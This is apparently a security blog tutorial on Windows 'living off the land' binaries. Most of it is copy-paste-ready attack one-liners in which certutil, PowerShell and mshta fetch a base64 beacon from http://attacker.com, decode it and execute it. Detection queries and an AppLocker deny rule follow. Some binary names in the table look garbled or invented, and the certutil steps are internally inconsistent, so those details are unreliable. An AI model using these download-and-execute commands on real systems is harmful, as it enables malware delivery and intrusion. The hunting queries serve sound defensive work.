Living Off the Land Binaries (LOLBins) - The Attacker's Built-in Toolkit

In 2025, the most successful cyberattacks rarely drop malware on disk. Instead, attackers live off the land - using tools already present on Windows systems to blend in with normal activity. These tools are called Living Off the Land Binaries (LOLBins).

What Are LOLBins?

LOLBins are legitimate, signed Microsoft binaries that ship with Windows and serve everyday administrative tasks. Because they're trusted and whitelisted by virtually every EDR/AV, attackers abuse them for:

  • File download & execution
  • Lateral movement
  • Privilege escalation
  • Persistence
  • Defense evasion
  • Credential dumping

Top 10 LOLBins Still Working in 2025

BinaryCommon Malicious UseMITRE ATT&CK
certutil.exeDownload & decode filesT1140
powershell.exeScript execution, reflection loadingT1059.001
mshta.exeExecute malicious HTA/JavaScriptT1218.005
rundll32.exeLoad DLLs without regsvr32T1218.011
wmic.exeRemote process creationT1047
bitsadmin.exeBackground file transferT1197
cmstp.exeExecute INF with embedded payloadT1218.003
regsvr32.exeSilent scriptlet execution (/s /i)T1218.010
esentaupdate.exeBypass AppLocker (new in Win11 24H2)T1218
odbccconf.exeRegistry manipulation for persistenceT1547

Real-World Example: Certutil File Download + Decode (Still Undetected by Many EDRs in 2025)

:: 1. Encode payload on attacker machine (Kali/WSL)
echo "TVqQAAMAAAAEAAAA//8AALgAAAAA..." > beacon.txt
certutil -encode beacon.txt beacon.b64
 
:: 2. Host beacon.b64 on http://attacker.com/beacon.b64
 
:: 3. On victim machine - one-liner download + decode + execute
certutil -urlcache -split -f http://attacker.com/beacon.b64 C:\Windows\Temp\beacon.exe
certutil -decode C:\Windows\Temp\beacon.b64 C:\Windows\Temp\beacon.exe
C:\Windows\Temp\beacon.exe

One-liner version (copy-paste ready):

certutil -urlcache -f http://attacker.com/beacon.b64 %TEMP%\x.b64 & certutil -decode %TEMP%\x.b64 %TEMP%\x.exe & %TEMP%\x.exe

PowerShell version (even stealthier):

IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/ps.txt')
# ps.txt contains:
$wc=New-Object Net.WebClient;$wc.Headers.Add('User-Agent','Mozilla/5.0')
$wc.Proxy=New-Object Net.WebClient;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials
$b64=$wc.DownloadString('http://attacker.com/beacon.b64')
$bytes=[Convert]::FromBase64String($b64)
[IO.File]::WriteAllBytes("$env:TEMP\x.exe",$bytes)
Start-Process "$env:TEMP\x.exe"

Advanced: Mshta + JavaScript Payload (No .exe on Disk)

mshta vbscript:CreateObject("WScript.Shell").Run("powershell -nop -w hidden -c IEX((new-object net.webclient).downloadstring('http://attacker.com/ps'))")(window.close)

Or using base64-encoded HTA:

mshta "data:text/html,<script>new ActiveXObject('WScript.Shell').Run('calc.exe');</script>"

Safe Lab Demo: Build Your Own LOLBin Playground (Windows 10/11)

# 1. Create test payload
$b = [Text.Encoding]::Unicode.GetBytes("notepad.exe")
$enc = [Convert]::ToBase64String($b)
$enc | Out-File -Encoding ascii payload.b64
 
# 2. Start local web server
python3 -m http.server 8080
 
# 3. Download & execute using ONLY LOLBins
certutil -urlcache -split -f http://127.0.0.1:8080/payload.b64 C:\temp\p.b64
certutil -decode C:\temp\p.b64 C:\temp\p.exe
rundll32.exe url.dll,FileProtocolHandler C:\temp\p.exe

Detection & Hunting Tips (Blue Team 2025)

// Sigma rule example - Certutil downloading + decoding
DeviceProcessEvents
| where FileName in~ ("certutil.exe")
| where ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -urlcache "
| where InitiatingProcessParentFileName != "msiexec.exe"

Sysmon Event ID 1 hunting queries:

// Certutil unusual parent
ProcessName:"certutil.exe" AND ParentProcessName NOT IN ("explorer.exe","cmd.exe","powershell.exe")

Block common abuse (AppLocker / WDAC):

<!-- Deny certutil internet access -->
<Rule>
  <Id>fd686d83-a829-4351-8ff4-27c7de5755d2</Id>
  <Name>Block certutil URL download</Name>
  <Path>%WINDIR%\system32\certutil.exe</Path>
  <Exceptions>
    <NetworkZone>TrustedSites</NetworkZone>
  </Exceptions>
</Rule>

Final Word

LOLBins aren't going away. Microsoft can't remove certutil.exe or powershell.exe without breaking legitimate enterprise use. The only defense is visibility + context.

Keep an eye on new built-in features in Windows — every new utility, helper exe, or background process is a potential fresh LOLBin candidate waiting to be weaponized.

LOLBins candidates in 2025

  • FODHelper.exe - UAC bypass (still works on Win11 24H2 with default settings)
  • ie4uinit.exe -ClearIconCache - High-integrity code execution
  • slui.exe - Privilege escalation via hijackable folder
  • Windows.Media.BackgroundPlayback.exe - New in Windows 11 24H2

Red Team: Master 20 LOLBins = 95% success rate in 2025 engagements
Blue Team: Hunt parent-child relationships + network connections = detect 90% of LOLBin abuse

Stay sharp. The binaries are already on the machine — the question is who controls them.

Test everything in a lab. Never run untrusted code on production systems.

Related Cybersecurity Guides and Tutorials: